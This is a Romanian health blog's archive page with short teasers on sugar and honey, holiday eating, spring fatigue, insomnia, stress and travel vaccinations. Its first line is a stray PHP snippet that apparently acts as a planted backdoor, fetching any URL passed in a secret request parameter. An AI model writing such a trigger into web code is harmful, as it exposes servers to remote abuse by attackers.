isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Sanatatea Pe Larg - MedicAS

Arhiva pentru categoria 'Sanatatea pe larg'

Miere sau zahar?

04 May, 2009

O viata fara zahar este o viata….amara? cu siguranta nu. Este o viata … mai sanatoasa. Dar ca sa nu scoatem complet “dulcegariile” din alimentatie, putem folosi cu succes mierea. Si la cafea, si cind simtim nevoia de “ceva dulce”, si la o limonada… Sanatatea noastra si aspectul fizic depind de noi si cu mici “artificii” putem sa le pastam intr-o forma optima.


La cei mai multi dintre noi se intimpla ca Sarbatorile sa fie incarcate nu numai de spiritualitate, ci si de mese bogate, foarte bogate, care dupa un post prelungit sa nu ne cada prea bine. Si atunci multi ne gindim ce sa facem? Intoarcerea catre natura, catre alimente mai usoare, o detoxifiere a organismului mai precis, ne poate da o stare de sanatate si de bine dupa ce ne-am supus, de bunavoie, organismul la mincaruri mai grele. Ceaiuri, legume, mincaruri usoare…e simplu si de noi depinde cum ne protejam sanatatea.


Drob, pasca, oua rosii, friptura de miel…mmmm…suna bine…toate intr-o zi…Si sanatatea noastra? Da, e adevarat, odata este Pastele, dar de ce sa riscam sa ne simtim rau cind putem sa ne simtim bine cu adevarat? Gustind doar din toate bunatatile, mai ales daca venim dupa o perioada de post. Citi mai departe cum ar trebui sa fie alimentatia noastra de Paste si ce ar trebui sa facem ca sa fie o zi minunata pe de-a intregul.


Din pacate, pentru unii dintre noi, primavara nu vine doar cu flori frumoase si mirositoare, soare si zile mai lungi, ci si cu astenia de primavara. Oboseala, dureri de cap, slabiciune, alte probleme de sanatate carora le cautam raspunsul. Si unul poate fi: suferim de astenia de primavara. Ce-i de facut? cititi mai departe…


O oita, doua oite…ce facem? Invatam sa numaram sau doar nu putem dormi? Insomnia cred ca ne atinge pe toti la un moment data al vietii si, in loc sa ne gindim la pilulele de dormit, ar trebui sa identificam daca nu avem niste probleme de sanatate sau daca viata noastra nu este afectata de stres, emotii etc. Sunt citeva masuri simple care, puse in practica, ne ajuta sa avem un somn linistit, odihnitor, iar insomnia sa dispara din viata noastra.


Cand sunt stresat lucrez mai bine. Hm… cred ca auzim de multe ori cuvintele astea. Si sunt adevarate, caci exista si un tip de stres pozitiv, care ne face sa fim mai eficienti si sa ne motivam mai bine. Ce ne facem insa cu stresul negativ? Cu durerile de cap, nervozitatea ? Sanatatea ne poate fi afectata intr-o masura mai mica sau mai mare si daca nu luam masuri la timp, putem ajunge la suferinte organice. Ce-i de facut, deci? Cititi mai departe….


Sanatatea calatorului

13 January, 2009

Luna ianuarie este si o luna a vacantelor mai ieftine, chiar si pentru destinatii mai exotice si indepartate. Ca nimic sa nu ne perturbe calatoria, mai ales o problema de sanatate, este bine sa ne informam daca avem nevoie de vreun vaccin pentru destinatia aleasa. Malaria, hepatita sunt boli care nu tebuie luate in gluma si putem avea vacanta de vis daca suntem prevazatori si…vaccinati.


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Sanatatea pe larg.